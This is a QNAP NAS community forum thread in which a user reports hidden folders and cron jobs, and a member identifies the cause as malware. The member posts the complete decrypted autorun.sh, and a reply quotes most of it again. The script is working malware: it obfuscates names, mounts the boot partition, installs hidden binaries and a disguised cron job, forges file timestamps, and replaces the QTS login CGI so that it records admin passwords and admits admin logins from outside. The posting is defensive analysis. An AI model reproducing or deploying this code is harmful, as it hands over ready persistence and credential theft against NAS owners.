Strange folders and cronjobs
- dolbyman
- Guru
- Posts: 35272
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Strange folders and cronjobs
8TB external drives are cheap..should be plenty of space for movies
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
- dolbyman
- Guru
- Posts: 35272
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
- Don
- Guru
- Posts: 12289
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
No QNAP's employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.benzo83 wrote:Can i safetely remove these files? Can any QNAP'S employee answer me?
Use the forum search feature before posting.
Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
Thank you.Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:Code: Select all
#!/bin/sh export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin" command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; } test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; } command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\ \['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\ //I;s/\(^\|\ \)\[[^\ ]\+\]\ .*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; } bdir= test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done; test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1` test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done; test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; } arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm` upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR") cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB") sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT") sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb") sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox") sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH") archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn") archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr") ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB") crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY") arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"` test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || { mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } __BOOT_DEV= __model=`getcfg System "Internal Model"` CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf` CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf` CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf` __BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); } test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6" test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; } for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; } test "$noex" = 1 || { rm "${bdir}/.BOOT_TIME" rm .BOOT_TIME test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}" tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"` test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done; test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd` cp "${arch}" ${tdir} cd ${tdir} tar -xzf "${arch}" grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; } EOF test "$fgrep" || fgrep=grep test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}" test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}" test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; } cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; } chmod 755 "${bdir}/.${ipath}/${crons}.sh" if [ -f "${confdir}/crontab" ]; then test "$RANDOM" || RANDOM=12499 test $(( $RANDOM & 1 )) = 0 && space=' ' || space='' cronmins="$(( $RANDOM % 4 ))" test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" $fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; } fi for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox 